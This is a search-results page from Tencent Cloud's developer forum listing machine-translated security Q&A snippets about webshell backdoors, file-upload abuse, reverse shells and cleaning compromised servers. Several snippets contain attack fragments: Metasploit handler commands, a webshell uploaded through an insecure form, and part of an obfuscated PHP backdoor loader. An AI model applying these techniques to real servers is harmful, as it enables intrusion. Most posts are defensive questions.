腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
安全经典的
ASP
主机-类似于
ASP
.NET中的信任
、
、
在圣诞节期间,我们遇到了一个主要的服务器妥协,当时一个压缩的FTP帐户被用来
上传
一个.net
后门
,使它能够访问整个
asp
.net机器帐户,并包含了数十家电子商务商店。但是,由于我们的应用程序是典型的
ASP
和.NET,除非我也能保护
ASP
,否则保护.net几乎没有用。 有谁知道我可能需要实现什么样的附加安全性才能以类似的方式保护
ASP
?
浏览 0
提问于2012-01-25
得票数 1
1
回答
怎么才能
上传
后门
?
我正在检查一个Wordpress网站的客户端,我发现一些
后门
在webroot文件夹中存在。攻击者
上传
后门
的方式有哪些?
浏览 0
提问于2014-11-05
得票数 -1
1
回答
什么时候使用绑定shell与反向shell?
假设您成功地获得了一个meterpreter shell并希望
上传
一个
后门
,那么您应该使用什么作为
后门
文件中的有效负载--我应该使用TCP绑定外壳还是TCP反向shell?
浏览 0
提问于2018-08-05
得票数 10
回答已采纳
1
回答
这台服务器是我做的吗?
、
表单上的照片
上传
器只接受jpegs、jpgs和png文件。我去把一张照片
上传
到我的桌面上,无意中选择了一个PHP文件,文件末尾有一个~。THe ~在文件名中诱使表单认为它是一个合法的文件。所以我去了Github,找到了一个php
后门
的存储库。然后我把它
上传
到服务器上,向我的老板展示。然后,我访问了浏览器example.com/
后门
. the中的文件。当我老板抓狂后,我就把它删除了。第二天,我检查了GitHub上的问题,有人说我
上传
到服务器上的
后门
文件有一个<e
浏览 0
提问于2015-11-07
得票数 0
1
回答
现在给它打补丁
、
在我的php网站托管环境中,我发现用下面的代码创建的临时文件很少。<?phpecho '<input type="file" name="file
浏览 2
提问于2018-04-18
得票数 2
1
回答
执行一个远程PHP,它位于我没有访问权限的文件中
、
、
我试图利用PHP
后门
进行未经消毒的文件
上传
。基本上,文件
上传
成功,我可以在web应用程序/images/目录中看到我的
后门
,但是当我单击该文件来执行它时,我会给出一个错误,声明‘许可被拒绝’。
浏览 0
提问于2014-09-03
得票数 1
2
回答
怎么才能把
后门
送到?
我想知道一个
后门
可以提供给某人的方式,以及各种方法的优缺点。这两种方法的优点和缺点是什么,我什么时候应该使用每种方法?
浏览 0
提问于2017-03-20
得票数 1
2
回答
在没有任何输入的情况下用selenide webdriver
上传
文件
、
、
、
、
我正在尝试使用java selenide自动化测试
上传
文件。我试着用:但这并没有帮助,因为没有文件
上传
的输入框。elem ).setFileDetector
浏览 0
提问于2017-07-18
得票数 1
回答已采纳
1
回答
我的服务器安全了吗?
、
、
、
、
黑客攻击了一个过时的第三方编辑器(在PHP中),并在PHP中植入了一个
后门
脚本,并对我的网站造成了严重的破坏。我花了整整一个周末的时间清理
后门
脚本和他遗留在我服务器上的任何恶意代码。由于黑客通过PHP
上传
了
后门
,所以我在php.ini中禁用了这个函数。所以现在我只能通过ftp
上传
。 安装suhosin。找到eval()中调用的合法函数,将它们放在suhos
浏览 1
提问于2013-10-28
得票数 3
1
回答
访问本地服务
、
、
我们有一个web应用程序(Web2.0),它具有一些自定义代码,用于在
上传
文件时插入一个.NET服务。
浏览 1
提问于2015-06-29
得票数 0
回答已采纳
2
回答
Php编码的shell代码?
、
在查看我的日志文件时,我发现了一个我无法识别的文件。它看起来像编码过的php脚本。我想看看内容或得到一个想法的脚本做什么。下面是完整的编码php脚本。 <?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZG
浏览 3
提问于2012-02-27
得票数 1
回答已采纳
1
回答
后门
:PHP/webshell恶意软件
、
、
、
但是像往常一样,在
上传
新网站到现场环境之前,我会备份当前的实时网站。当我下载Wordpress安装时,我的windows弹出了下面的消息。发现恶意软件: 这到底是什么?这对我的电脑是危险的,还是网站的
后门
。这是怎么发生的。在这件事上,任何事情都会很有帮助。我应该在我的整个电脑上进行扫描吗?
浏览 6
提问于2017-04-26
得票数 1
回答已采纳
1
回答
WordPress插件上载默认值为777权限
、
、
、
我注意到一个主要的安全问题,每当我
上传
一个wordpress插件时,它会默认所有的目录和文件都是777权限。这意味着我需要手动更正这些文件权限。
浏览 1
提问于2013-01-07
得票数 0
回答已采纳
3
回答
MSFConsole/Kali Linux -获得对unix系统的根访问权
、
、
、
、
通过创建PHP
后门
并通过SQL注入
上传
它,我成功地进入了系统(Raspberry Pi)。通过使用MSFConsole、BASH (从
后门
)或其他方式,是否有可能在Linux (拉斯拜安)中提升特权?exploit/multi/handlerset LHOST <my IP>然后,我通过不安全的文件
上传
将hackme.php
上传
到web服务器,然后浏览到<
浏览 0
提问于2015-08-09
得票数 9
1
回答
在
ASP
经典版中Request("*")返回什么?
我偶然发现了一些访问Request(chr(42))的代码(下面)并执行它。我似乎找不到什么'*‘会返回,因为它似乎不像一个有效的QueryString变量名。
浏览 1
提问于2013-10-14
得票数 1
回答已采纳
1
回答
帮助理解PHP反向Shells
、
它很简单,我可以获得登录凭证到网站,并
上传
一个For反向外壳。再次,我获得了登录访问网站的
上传
页面。我尝试
上传
相同的反向shell脚本,但在设置netcat侦听器后无法访问。最终,我要做的是
上传
一个php
后门
脚本:然后,我不得不利用index.php页面上的以下漏洞,该漏洞允许注入$_COOKIE['lang']);然后,我使用下面的c
浏览 0
提问于2020-06-20
得票数 1
1
回答
供应商是否在网络设备上设置
后门
?
、
、
、
有几篇关于“厂商故意在网络设备上安装
后门
”的文章,例如硬件供应商提供每一种产品的
后门
。这些
后门
是真的吗?这也是一种潜在的危险吗?
浏览 0
提问于2018-08-26
得票数 0
回答已采纳
2
回答
本地文件包含(后期开发)
、
、
我知道我可以
上传
后门
和反向外壳连接等,但是,我更感兴趣的是其他可能性,而不是这些。)的情况下,对LFI进行简单而通用的后期开发。
浏览 0
提问于2019-06-09
得票数 1
1
回答
ReportViewer控件参数安全性
、
、
我正在考虑在自定义web应用程序中的Microsoft.ReportViewer.WebForms web表单上使用RDL控件来显示
ASP
.NET报表。RDL报告使用参数。其中一个参数是部门参数。部门参数值(以及所有其他参数值)将在承载ReportViewer控件的
ASP
.NET web窗体的代码后台逻辑中以编程方式设置。服务器端逻辑根据用户的配置文件查找部门参数值。我的问题是:在ReportViewer控件中是否有任何已知的
后门
,用户可以通过
后门
将“部门”值作为HTTP请求的一部分传递,并获得对他们不应具有访问权限的数据
浏览 16
提问于2018-08-04
得票数 0
回答已采纳
1
回答
任何熟悉press87.php 87.php文件的人--这是黑客吗?
、
、
我刚刚注意到我的服务器上的Joomla安装上有一个名为“named 87.php”的奇怪文件,它与任何特定的内容都没有关联。它似乎是加密的,并在互联网上搜索,它似乎出现在许多目录-包括WP安装-但似乎是随机的地方。这是黑客吗?有人知道这件事吗?干杯!
浏览 4
提问于2015-06-27
得票数 0
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
什么是 webshell?基础
网站木马+webshell上传绕过方法
浅谈Webshell对网站的危害以及预防措施
第1课-劫持准备之什么是webshell
ASP.NET心得
热门
标签
更多标签
云服务器
ICP备案
实时音视频
对象存储
云直播
活动推荐
运营活动
广告
关闭
领券